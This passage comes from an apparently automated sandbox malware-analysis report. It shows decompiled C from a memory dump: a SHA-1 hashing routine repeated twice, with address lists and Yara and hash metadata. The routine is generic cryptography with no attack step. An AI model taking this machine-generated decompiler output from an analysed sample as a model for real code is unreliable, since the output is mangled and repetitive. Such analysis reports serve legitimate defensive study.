					asm("rol esi, 0x5");
					_t345 = _v8;
					asm("ror edi, 0x2");
					_t440 = ((_t282 | _t479) & _t366 | _t282 & _t479) +  *((intOrPtr*)(_t549 + _t345 * 4 - 0x148)) + _t521 + _v16 - 0x70e44324;
					_v16 = _t366;
					_t377 = _v12;
					_v12 = _t440;
					asm("rol edx, 0x5");
					_v8 = _t282;
					_t442 = ((_t479 | _t377) & _t282 | _t479 & _t377) +  *((intOrPtr*)(_t549 + _t345 * 4 - 0x144)) + _t440 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t302 = _v12;
					_v8 = _t479;
					_v12 = _t442;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t533 = ((_t377 | _t302) & _t479 | _t377 & _t302) +  *((intOrPtr*)(_t549 + _t345 * 4 - 0x140)) + _t442 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t445 = _t377;
					_t366 = _v12;
					_v8 = _t445;
					_v12 = _t533;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t510 = ((_t302 | _t366) & _t445 | _t302 & _t366) +  *((intOrPtr*)(_t549 + _t345 * 4 - 0x13c)) + _t533 + _v16 - 0x70e44324;
					_t412 = _t302;
					_t282 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t510;
					_t346 = _t345 + 5;
					_v8 = _t346;
				} while (_t346 < 0x3c);
				_t487 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t488 = _v8;
					asm("ror eax, 0x2");
					_t536 = (_t412 ^ _t366 ^ _t282) +  *((intOrPtr*)(_t549 + _t487 * 4 - 0x14c)) + _t510 + _v16 - 0x359d3e2a;
					_t351 = _v12;
					_v16 = _t412;
					_v12 = _t536;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t453 = (_t366 ^ _t282 ^ _t351) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x148)) + _t536 + _v16 - 0x359d3e2a;
					_v16 = _t366;
					_t378 = _v12;
					_v12 = _t453;
					asm("rol edx, 0x5");
					_v16 = _t282;
					asm("ror ecx, 0x2");
					_t306 = (_t282 ^ _t351 ^ _t378) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x144)) + _t453 + _v16 - 0x359d3e2a;
					_t412 = _v12;
					_v12 = _t306;
					asm("rol eax, 0x5");
					_v16 = _t351;
					_t543 = (_t351 ^ _t378 ^ _t412) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x140)) + _t306 + _v16 - 0x359d3e2a;
					_t308 = _t378;
					_v8 = _t351;
					asm("ror edx, 0x2");
					_v8 = _t378;
					_t366 = _v12;
					_v12 = _t543;
					asm("rol esi, 0x5");
					_t487 = _t488 + 5;
					_t510 = (_t308 ^ _t412 ^ _t366) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x13c)) + _t543 + _v16 - 0x359d3e2a;
					_v16 = _t308;
					_t282 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t412;
					_v12 = _t510;
					_v8 = _t487;
				} while (_t487 < 0x50);
				_t489 = _a4;
				_t489[2] = _t489[2] + _t366;
				_t489[3] = _t489[3] + _t412;
				_t314 = _t489[4] + _v16;
				 *_t489 =  *_t489 + _t510;
				_t489[1] = _t489[1] + _t282;
				_t489[4] = _t314;
				_t489[0x17] = 0;
				return _t314;
			}


































































                                                                                                                                                    0x00408c5b
                                                                                                                                                    0x00408c61
                                                                                                                                                    0x00408c69
                                                                                                                                                    0x00408c6b
                                                                                                                                                    0x00408c6f
                                                                                                                                                    0x00408c71
                                                                                                                                                    0x00408c71
                                                                                                                                                    0x00408c74
                                                                                                                                                    0x00408c96
                                                                                                                                                    0x00408cbc
                                                                                                                                                    0x00408ce2
                                                                                                                                                    0x00408d04
                                                                                                                                                    0x00408d0b
                                                                                                                                                    0x00408d0e
                                                                                                                                                    0x00408d11
                                                                                                                                                    0x00408d1a
                                                                                                                                                    0x00408d20
                                                                                                                                                    0x00408d27
                                                                                                                                                    0x00408d38
                                                                                                                                                    0x00408d3b
                                                                                                                                                    0x00408d3e
                                                                                                                                                    0x00408d42
                                                                                                                                                    0x00408d44
                                                                                                                                                    0x00408d46
                                                                                                                                                    0x00408d4f
                                                                                                                                                    0x00408d52
                                                                                                                                                    0x00408d55
                                                                                                                                                    0x00408d60
                                                                                                                                                    0x00408d66
                                                                                                                                                    0x00408d68
                                                                                                                                                    0x00408d68
                                                                                                                                                    0x00408d6b
                                                                                                                                                    0x00408d6e
                                                                                                                                                    0x00408d6e
                                                                                                                                                    0x00408d73
                                                                                                                                                    0x00408d75
                                                                                                                                                    0x00408d78
                                                                                                                                                    0x00408d7b
                                                                                                                                                    0x00408d81
                                                                                                                                                    0x00408d84
                                                                                                                                                    0x00408d87
                                                                                                                                                    0x00408d90
                                                                                                                                                    0x00408d96
                                                                                                                                                    0x00408d9f
                                                                                                                                                    0x00408dae
                                                                                                                                                    0x00408db5
                                                                                                                                                    0x00408db8
                                                                                                                                                    0x00408dbb
                                                                                                                                                    0x00408dc4
                                                                                                                                                    0x00408dc7
                                                                                                                                                    0x00408dca
                                                                                                                                                    0x00408de2
                                                                                                                                                    0x00408de9
                                                                                                                                                    0x00408deb
                                                                                                                                                    0x00408dee
                                                                                                                                                    0x00408df1
                                                                                                                                                    0x00408dfa
                                                                                                                                                    0x00408e01
                                                                                                                                                    0x00408e04
                                                                                                                                                    0x00408e07
                                                                                                                                                    0x00408e16
                                                                                                                                                    0x00408e1d
                                                                                                                                                    0x00408e20
                                                                                                                                                    0x00408e23
                                                                                                                                                    0x00408e2c
                                                                                                                                                    0x00408e36
                                                                                                                                                    0x00408e39
                                                                                                                                                    0x00408e45
                                                                                                                                                    0x00408e48
                                                                                                                                                    0x00408e4f
                                                                                                                                                    0x00408e52
                                                                                                                                                    0x00408e55
                                                                                                                                                    0x00408e5a
                                                                                                                                                    0x00408e5d
                                                                                                                                                    0x00408e66
                                                                                                                                                    0x00408e77
                                                                                                                                                    0x00408e7a
                                                                                                                                                    0x00408e7d
                                                                                                                                                    0x00408e84
                                                                                                                                                    0x00408e87
                                                                                                                                                    0x00408e8a
                                                                                                                                                    0x00408e8d
                                                                                                                                                    0x00408e8f
                                                                                                                                                    0x00408e92
                                                                                                                                                    0x00408e95
                                                                                                                                                    0x00408e9e
                                                                                                                                                    0x00408ea3
                                                                                                                                                    0x00408ea3
                                                                                                                                                    0x00408eb8
                                                                                                                                                    0x00408ebb
                                                                                                                                                    0x00408ebe
                                                                                                                                                    0x00408ec5
                                                                                                                                                    0x00408ec8
                                                                                                                                                    0x00408ecb
                                                                                                                                                    0x00408ee0
                                                                                                                                                    0x00408ee7
                                                                                                                                                    0x00408eea
                                                                                                                                                    0x00408eee
                                                                                                                                                    0x00408ef1
                                                                                                                                                    0x00408ef6
                                                                                                                                                    0x00408ef9
                                                                                                                                                    0x00408f08
                                                                                                                                                    0x00408f0b
                                                                                                                                                    0x00408f12
                                                                                                                                                    0x00408f15
                                                                                                                                                    0x00408f18
                                                                                                                                                    0x00408f1b
                                                                                                                                                    0x00408f1e
                                                                                                                                                    0x00408f26
                                                                                                                                                    0x00408f34
                                                                                                                                                    0x00408f37
                                                                                                                                                    0x00408f3a
                                                                                                                                                    0x00408f3a
                                                                                                                                                    0x00408f41
                                                                                                                                                    0x00408f44
                                                                                                                                                    0x00408f47
                                                                                                                                                    0x00408f4f
                                                                                                                                                    0x00408f5d
                                                                                                                                                    0x00408f60
                                                                                                                                                    0x00408f67
                                                                                                                                                    0x00408f6a
                                                                                                                                                    0x00408f6d
                                                                                                                                                    0x00408f70
                                                                                                                                                    0x00408f73
                                                                                                                                                    0x00408f7c
                                                                                                                                                    0x00408f83
                                                                                                                                                    0x00408f83
                                                                                                                                                    0x00408f89
                                                                                                                                                    0x00408fa2
                                                                                                                                                    0x00408fa5
                                                                                                                                                    0x00408fac
                                                                                                                                                    0x00408faf
                                                                                                                                                    0x00408fb2
                                                                                                                                                    0x00408fc4
                                                                                                                                                    0x00408fce
                                                                                                                                                    0x00408fd1
                                                                                                                                                    0x00408fda
                                                                                                                                                    0x00408fdd
                                                                                                                                                    0x00408fe4
                                                                                                                                                    0x00408fe7
                                                                                                                                                    0x00408fed
                                                                                                                                                    0x00409000
                                                                                                                                                    0x00409007
                                                                                                                                                    0x0040900a
                                                                                                                                                    0x0040900d
                                                                                                                                                    0x00409010
                                                                                                                                                    0x00409019
                                                                                                                                                    0x0040901c
                                                                                                                                                    0x0040902f
                                                                                                                                                    0x00409032
                                                                                                                                                    0x0040903c
                                                                                                                                                    0x0040903f
                                                                                                                                                    0x00409041
                                                                                                                                                    0x0040904a
                                                                                                                                                    0x0040904d
                                                                                                                                                    0x00409060
                                                                                                                                                    0x00409066
                                                                                                                                                    0x00409069
                                                                                                                                                    0x00409070
                                                                                                                                                    0x00409072
                                                                                                                                                    0x00409075
                                                                                                                                                    0x00409078
                                                                                                                                                    0x0040907b
                                                                                                                                                    0x0040907e
                                                                                                                                                    0x00409081
                                                                                                                                                    0x0040908a
                                                                                                                                                    0x0040908f
                                                                                                                                                    0x00409092
                                                                                                                                                    0x00409092
                                                                                                                                                    0x004090a5
                                                                                                                                                    0x004090a8
                                                                                                                                                    0x004090ab
                                                                                                                                                    0x004090b2
                                                                                                                                                    0x004090b5
                                                                                                                                                    0x004090b8
                                                                                                                                                    0x004090bb
                                                                                                                                                    0x004090ce
                                                                                                                                                    0x004090d1
                                                                                                                                                    0x004090dc
                                                                                                                                                    0x004090df
                                                                                                                                                    0x004090eb
                                                                                                                                                    0x004090ee
                                                                                                                                                    0x004090f4
                                                                                                                                                    0x004090f7
                                                                                                                                                    0x004090fa
                                                                                                                                                    0x00409101
                                                                                                                                                    0x00409111
                                                                                                                                                    0x00409114
                                                                                                                                                    0x0040911a
                                                                                                                                                    0x0040911d
                                                                                                                                                    0x00409124
                                                                                                                                                    0x00409126
                                                                                                                                                    0x00409129
                                                                                                                                                    0x0040912c
                                                                                                                                                    0x0040912f
                                                                                                                                                    0x00409132
                                                                                                                                                    0x00409139
                                                                                                                                                    0x00409148
                                                                                                                                                    0x0040914b
                                                                                                                                                    0x00409152
                                                                                                                                                    0x00409155
                                                                                                                                                    0x00409158
                                                                                                                                                    0x0040915b
                                                                                                                                                    0x0040915e
                                                                                                                                                    0x00409161
                                                                                                                                                    0x00409164
                                                                                                                                                    0x0040916d
                                                                                                                                                    0x0040917e
                                                                                                                                                    0x00409186
                                                                                                                                                    0x0040918c
                                                                                                                                                    0x0040918f
                                                                                                                                                    0x00409191
                                                                                                                                                    0x00409194
                                                                                                                                                    0x00409197
                                                                                                                                                    0x004091a4

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 0-3887548279
                                                                                                                                                    • Opcode ID: 12c64bb4fed4ba15b0d94bc32ec5b981084095cdfb2f0bbc0a7b28738ecc2baf
                                                                                                                                                    • Instruction ID: b73bfbe5203ed15e55806329a11c30ac4546ab7b0022ec9bad2a3cdcb1a6a9fa
                                                                                                                                                    • Opcode Fuzzy Hash: 12c64bb4fed4ba15b0d94bc32ec5b981084095cdfb2f0bbc0a7b28738ecc2baf
                                                                                                                                                    • Instruction Fuzzy Hash: 0E022BB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408C60, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E00408C60(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                                                                                                                    0x00408c6b
                                                                                                                                                    0x00408c6f
                                                                                                                                                    0x00408c71
                                                                                                                                                    0x00408c71
                                                                                                                                                    0x00408c74
                                                                                                                                                    0x00408c96
                                                                                                                                                    0x00408cbc
                                                                                                                                                    0x00408ce2
                                                                                                                                                    0x00408d04
                                                                                                                                                    0x00408d0b
                                                                                                                                                    0x00408d0e
                                                                                                                                                    0x00408d11
                                                                                                                                                    0x00408d1a
                                                                                                                                                    0x00408d20
                                                                                                                                                    0x00408d27
                                                                                                                                                    0x00408d38
                                                                                                                                                    0x00408d3b
                                                                                                                                                    0x00408d3e
                                                                                                                                                    0x00408d42
                                                                                                                                                    0x00408d44
                                                                                                                                                    0x00408d46
                                                                                                                                                    0x00408d4f
                                                                                                                                                    0x00408d52
                                                                                                                                                    0x00408d55
                                                                                                                                                    0x00408d60
                                                                                                                                                    0x00408d66
                                                                                                                                                    0x00408d68
                                                                                                                                                    0x00408d68
                                                                                                                                                    0x00408d6b
                                                                                                                                                    0x00408d6e
                                                                                                                                                    0x00408d6e
                                                                                                                                                    0x00408d73
                                                                                                                                                    0x00408d75
                                                                                                                                                    0x00408d78
                                                                                                                                                    0x00408d7b
                                                                                                                                                    0x00408d81
                                                                                                                                                    0x00408d84
                                                                                                                                                    0x00408d87
                                                                                                                                                    0x00408d90
                                                                                                                                                    0x00408d96
                                                                                                                                                    0x00408d9f
                                                                                                                                                    0x00408dae
                                                                                                                                                    0x00408db5
                                                                                                                                                    0x00408db8
                                                                                                                                                    0x00408dbb
                                                                                                                                                    0x00408dc4
                                                                                                                                                    0x00408dc7
                                                                                                                                                    0x00408dca
                                                                                                                                                    0x00408de2
                                                                                                                                                    0x00408de9
                                                                                                                                                    0x00408deb
                                                                                                                                                    0x00408dee
                                                                                                                                                    0x00408df1
                                                                                                                                                    0x00408dfa
                                                                                                                                                    0x00408e01
                                                                                                                                                    0x00408e04
                                                                                                                                                    0x00408e07
                                                                                                                                                    0x00408e16
                                                                                                                                                    0x00408e1d
                                                                                                                                                    0x00408e20
                                                                                                                                                    0x00408e23
                                                                                                                                                    0x00408e2c
                                                                                                                                                    0x00408e36
                                                                                                                                                    0x00408e39
                                                                                                                                                    0x00408e45
                                                                                                                                                    0x00408e48
                                                                                                                                                    0x00408e4f
                                                                                                                                                    0x00408e52
                                                                                                                                                    0x00408e55
                                                                                                                                                    0x00408e5a
                                                                                                                                                    0x00408e5d
                                                                                                                                                    0x00408e66
                                                                                                                                                    0x00408e77
                                                                                                                                                    0x00408e7a
                                                                                                                                                    0x00408e7d
                                                                                                                                                    0x00408e84
                                                                                                                                                    0x00408e87
                                                                                                                                                    0x00408e8a
                                                                                                                                                    0x00408e8d
                                                                                                                                                    0x00408e8f
                                                                                                                                                    0x00408e92
                                                                                                                                                    0x00408e95
                                                                                                                                                    0x00408e9e
                                                                                                                                                    0x00408ea3
                                                                                                                                                    0x00408ea3
                                                                                                                                                    0x00408eb8
                                                                                                                                                    0x00408ebb
                                                                                                                                                    0x00408ebe
                                                                                                                                                    0x00408ec5
                                                                                                                                                    0x00408ec8
                                                                                                                                                    0x00408ecb
                                                                                                                                                    0x00408ee0
                                                                                                                                                    0x00408ee7
                                                                                                                                                    0x00408eea
                                                                                                                                                    0x00408eee
                                                                                                                                                    0x00408ef1
                                                                                                                                                    0x00408ef6
                                                                                                                                                    0x00408ef9
                                                                                                                                                    0x00408f08
                                                                                                                                                    0x00408f0b
                                                                                                                                                    0x00408f12
                                                                                                                                                    0x00408f15
                                                                                                                                                    0x00408f18
                                                                                                                                                    0x00408f1b
                                                                                                                                                    0x00408f1e
                                                                                                                                                    0x00408f26
                                                                                                                                                    0x00408f34
                                                                                                                                                    0x00408f37
                                                                                                                                                    0x00408f3a
                                                                                                                                                    0x00408f3a
                                                                                                                                                    0x00408f41
                                                                                                                                                    0x00408f44
                                                                                                                                                    0x00408f47
                                                                                                                                                    0x00408f4f
                                                                                                                                                    0x00408f5d
                                                                                                                                                    0x00408f60
                                                                                                                                                    0x00408f67
                                                                                                                                                    0x00408f6a
                                                                                                                                                    0x00408f6d
                                                                                                                                                    0x00408f70
                                                                                                                                                    0x00408f73
                                                                                                                                                    0x00408f7c
                                                                                                                                                    0x00408f83
                                                                                                                                                    0x00408f83
                                                                                                                                                    0x00408f89
                                                                                                                                                    0x00408fa2
                                                                                                                                                    0x00408fa5
                                                                                                                                                    0x00408fac
                                                                                                                                                    0x00408faf
                                                                                                                                                    0x00408fb2
                                                                                                                                                    0x00408fc4
                                                                                                                                                    0x00408fce
                                                                                                                                                    0x00408fd1
                                                                                                                                                    0x00408fda
                                                                                                                                                    0x00408fdd
                                                                                                                                                    0x00408fe4
                                                                                                                                                    0x00408fe7
                                                                                                                                                    0x00408fed
                                                                                                                                                    0x00409000
                                                                                                                                                    0x00409007
                                                                                                                                                    0x0040900a
                                                                                                                                                    0x0040900d
                                                                                                                                                    0x00409010
                                                                                                                                                    0x00409019
                                                                                                                                                    0x0040901c
                                                                                                                                                    0x0040902f
                                                                                                                                                    0x00409032
                                                                                                                                                    0x0040903c
                                                                                                                                                    0x0040903f
                                                                                                                                                    0x00409041
                                                                                                                                                    0x0040904a
                                                                                                                                                    0x0040904d
                                                                                                                                                    0x00409060
                                                                                                                                                    0x00409066
                                                                                                                                                    0x00409069
                                                                                                                                                    0x00409070
                                                                                                                                                    0x00409072
                                                                                                                                                    0x00409075
                                                                                                                                                    0x00409078
                                                                                                                                                    0x0040907b
                                                                                                                                                    0x0040907e
                                                                                                                                                    0x00409081
                                                                                                                                                    0x0040908a
                                                                                                                                                    0x0040908f
                                                                                                                                                    0x00409092
                                                                                                                                                    0x00409092
                                                                                                                                                    0x004090a5
                                                                                                                                                    0x004090a8
                                                                                                                                                    0x004090ab
                                                                                                                                                    0x004090b2
                                                                                                                                                    0x004090b5
                                                                                                                                                    0x004090b8
                                                                                                                                                    0x004090bb
                                                                                                                                                    0x004090ce
                                                                                                                                                    0x004090d1
                                                                                                                                                    0x004090dc
                                                                                                                                                    0x004090df
                                                                                                                                                    0x004090eb
                                                                                                                                                    0x004090ee
                                                                                                                                                    0x004090f4
                                                                                                                                                    0x004090f7
                                                                                                                                                    0x004090fa
                                                                                                                                                    0x00409101
                                                                                                                                                    0x00409111
                                                                                                                                                    0x00409114
                                                                                                                                                    0x0040911a
                                                                                                                                                    0x0040911d
                                                                                                                                                    0x00409124
                                                                                                                                                    0x00409126
                                                                                                                                                    0x00409129
                                                                                                                                                    0x0040912c
                                                                                                                                                    0x0040912f
                                                                                                                                                    0x00409132
                                                                                                                                                    0x00409139
                                                                                                                                                    0x00409148
                                                                                                                                                    0x0040914b
                                                                                                                                                    0x00409152
                                                                                                                                                    0x00409155
                                                                                                                                                    0x00409158
                                                                                                                                                    0x0040915b
                                                                                                                                                    0x0040915e
                                                                                                                                                    0x00409161
                                                                                                                                                    0x00409164
                                                                                                                                                    0x0040916d
                                                                                                                                                    0x0040917e
                                                                                                                                                    0x00409186
                                                                                                                                                    0x0040918c
                                                                                                                                                    0x0040918f
                                                                                                                                                    0x00409191
                                                                                                                                                    0x00409194
                                                                                                                                                    0x00409197
                                                                                                                                                    0x004091a4

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (
